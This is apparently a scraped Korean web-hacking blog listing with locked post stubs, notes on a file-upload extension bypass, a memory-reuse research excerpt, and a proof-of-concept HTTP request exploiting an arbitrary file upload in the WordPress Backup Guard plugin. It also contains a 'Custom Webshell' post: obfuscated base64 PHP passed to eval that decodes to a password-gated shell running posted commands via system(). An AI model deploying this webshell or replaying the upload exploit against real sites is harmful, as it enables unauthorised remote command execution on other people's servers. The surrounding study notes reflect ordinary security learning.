[S.T] PHP Traps

2016.05.17 09:19

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[wechall] yourself

2016.04.26 19:37

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[wechall] htmlspecialchars

2016.04.26 19:22

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[stypr] PHP Trick

2016.03.21 18:36

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Zip parser source

backup 2016.03.15 15:48


zip.zip


데헷

'backup' 카테고리의 다른 글

Proxy.py  (0) 2016.06.13
Pixiv Crawler  (0) 2016.06.02
Zip parser source  (0) 2016.03.15
PHP - unserialize  (0) 2015.08.18
profile  (0) 2015.02.06
ip-time n150ua  (0) 2014.11.25
Posted by Maid:: IzayoiSakuya

댓글을 달아 주세요


확장자'만' Whitelist로 검사하여 맞으면 통과시키는 방식..

'Web' 카테고리의 다른 글

Webhacking Study - Query sniff  (2) 2018.04.06
Webhacking Study - no more BLIND  (6) 2017.04.18
Upload 코드의 흔한 실수  (2) 2016.03.07
Custom Webshell  (0) 2016.02.12
SQL Injection Study  (3) 2015.11.13
PHP web development tips and tricks  (0) 2015.11.13
Posted by Maid:: IzayoiSakuya

댓글을 달아 주세요

  1. eorms36 2017.09.21 09:30  댓글주소  수정/삭제  댓글쓰기

    해당 코드가 어떤식으로 우회가 가능하여 취약하고 하신건지 설명해 주실 수 있나요?ㅠㅠ 몇일째 고민해봤는데 우회방법이 떠오르지않아 질문남깁니다!

    • Maid:: IzayoiSakuya 2017.10.12 10:14 신고  댓글주소  수정/삭제

      답변이 너무 늦어서 이 답변을 보실수 있을진 조금 의문이 듭니다.. 답변이 늦어진점 재차 죄송합니다.

      우선 해당코드가 PHP로 짜여져 있다는 점에서 이 코드를 사용한다면 Apache를 사용하고 있을 가능성이 높고, Apache의 설정에서 Multi-Extension을 제공하고 있을경우 해당코드에서는 test.php.jpg 등으로 우회가 가능합니다. 또한 제가 제공한 파일이름을 그대로 사용하고 있으니 경로 예측도 손쉽죠.

      제가 사용중인 php 7.0.22 버전에서는 제대로 된 확장자를 가져오는것으로 확인되고 있는데, 아마 5.x 버전에서는 위에 기술한 문제가 발생할 것으로 생각합니다.

      http://blog.habonyphp.com/entry/php-%ED%8C%8C%EC%9D%BC%EA%B2%BD%EB%A1%9C%EC%97%90-%EB%8C%80%ED%95%9C-%EC%A0%95%EB%B3%B4%EB%A5%BC-%EC%B6%9C%EB%A0%A5%ED%95%98%EB%8A%94-pathinfo%ED%95%A8%EC%88%98

      링크를 참조하시면 이해가 더 편하실겁니다

BoB 2기 할때 썼던 문서네요.

UAF를 알고 있었다면 심도깊은 문서가 되었겠지만, 단순 추측으로 끝난걸 현재시점에서 보니 다소 아쉽긴 합니다.

마지막 결론에 잠재적인 보안위협이 있을수 있다 라고 서술해 놓은건 지금봐도 대박

Scientific Research.docx


Scientific Research

Subject : Can I get difference memory address when re-allocate other memory?

Hypothesises:
           1. It’s have difference result on difference OS, because OS has Memory Manager.

2. It will be not return same memory address. If that not, it cause security  problem.

3. If I get same memory address when I allocated memory, I can read value that before memory has been returned

 

Testing Environment

1.     Windows 7 (SP1, 64bit, 4GB Memory, Intel® i3-2370M CPU, VS2012)

2.     Windows XP(SP3, 32bit, 512MB memory, VS2010, in VMware)

3.     Ubuntu 12.03 (3.5.0-37 Kernel, gcc compiler , in VMware)

 

How to test my Hypothsesises?

1.     Compile source code in different Env.

2.     Execute it


이하생략..

'I Think..' 카테고리의 다른 글

[BoB 2nd] Scientific Research - OS, Memory, malloc  (0) 2016.02.22
error based  (1) 2014.12.29
Posted by Maid:: IzayoiSakuya

댓글을 달아 주세요

해당 취약점만으로는 webshell을 동작시킬순 없고, 해당 사이트에 전제조건이 몇가지 필요하다. 

1. Backup Guard 를 통해 올린 파일의 경로를 알수 있어야 함. (디렉토리 리스팅이 가능하면 최적일것임.) 

 2. 관리자 권한을 사용 해야함. CSRF등을 통해서 하면 될듯? 

 3. php 확장자로 올라가지 않으므로 경로를 안다고 해도 텍스트 파일로 보일뿐. 따라서 LFI 등의 취약점이 연계되어야함.
POST http://192.168.0.91/wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.0.91
Connection: keep-alive
Content-Length: 1946784
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.0.91
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqE6amufQR0PqHraP
Referer: http://192.168.0.91/wp-admin/admin.php?page=backup_guard_backups
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: wordpress_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C19f158651e5c5c1fe87fe3a2ab632c9506ceb98f23e1d6fd747b05e8668fe492; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C1f1c5e2111be175767c1f2f14ac571a1fe9a5453240b9e331093ef6ce229f0d9; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1455757129

------WebKitFormBoundaryqE6amufQR0PqHraP
Content-Disposition: form-data; name="sgbpFile"; filename="test.php"
Content-Type: application/octet-stream


------WebKitFormBoundaryqE6amufQR0PqHraP
Content-Disposition: form-data; name="action"

backup_guard_importBackup
------WebKitFormBoundaryqE6amufQR0PqHraP--


Referer : http://www.pritect.net/blog/backup-guard-1-0-3-security-vulnerability


'Web > Wordpress' 카테고리의 다른 글

[wp-plugin] Backup Guard <= 1.0.2 - Arbitrary File Upload POC  (0) 2016.02.18
Posted by Maid:: IzayoiSakuya

댓글을 달아 주세요

Custom Webshell

Web 2016.02.12 14:47

기능 추가 '예정'


<?php

eval(ase64_decode('ICAgICAgICBzZXNzaW9uX3N0YXJ0KCk7CiAgICAgICAgaWYoISRfU0VTU0lPTlsnd2Vic2hlbGxpZCddKQogICAgICAgIHsKICAgICAgICAgICAgICAgIGVjaG8gIklOUFVUIFBBU1NXT1JEIjsKICAgICAgICAgICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCc+IjsKICAgICAgICAgICAgICAgIGVjaG8gIjxpbnB1dCB0eXBlPSdwYXNzd29yZCcgbmFtZT0ncCc+IjsKICAgICAgICAgICAgICAgIGVjaG8gIjwvZm9ybT4iOwogICAgICAgICAgICAgICAgaWYobWQ1KCRfUE9TVFsncCddKSA9PT0gJ1NPTUVfSEFTSFZBTFVFX0hFUkUnKQogICAgICAgICAgICAgICAgICAgICAgICAkX1NFU1NJT05bJ3dlYnNoZWxsaWQnXSA9ICd0cnVlJzsKICAgICAgICB9CiAgICAgICAgZWxzZXsKICAgICAgICAgICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD0nUE9TVCc+IjsKICAgICAgICAgICAgICAgIGVjaG8gIkNNRCA6IDxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdjJyBhdXRvZm9jdXM+IjsKICAgICAgICAgICAgICAgIGVjaG8gIjwvZm9ybT4iOwogICAgICAgICAgICAgICAgZWNobyAiUmVzdWx0IjsKICAgICAgICAgICAgICAgIGVjaG8gIjx0ZXh0YXJlYSBzdHlsZT0nd2lkdGg6MTAwJTtoZWlnaHQ6NTAlJz4iOwogICAgICAgICAgICAgICAgaWYoIWVtcHR5KCRfUE9TVFsnYyddKSkKICAgICAgICAgICAgICAgICAgICAgICAgc3lzdGVtKCRfUE9TVFsnYyddKTsKICAgICAgICAgICAgICAgIGVjaG8gIjwvdGV4dGFyZWE+IjsKICAgICAgICB9'));

?>

'Web' 카테고리의 다른 글

Webhacking Study - no more BLIND  (6) 2017.04.18
Upload 코드의 흔한 실수  (2) 2016.03.07
Custom Webshell  (0) 2016.02.12
SQL Injection Study  (3) 2015.11.13
PHP web development tips and tricks  (0) 2015.11.13
Error based SQL  (0) 2015.10.28
Posted by Maid:: IzayoiSakuya

댓글을 달아 주세요

[stypr] php reverse

2015.12.29 09:08

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.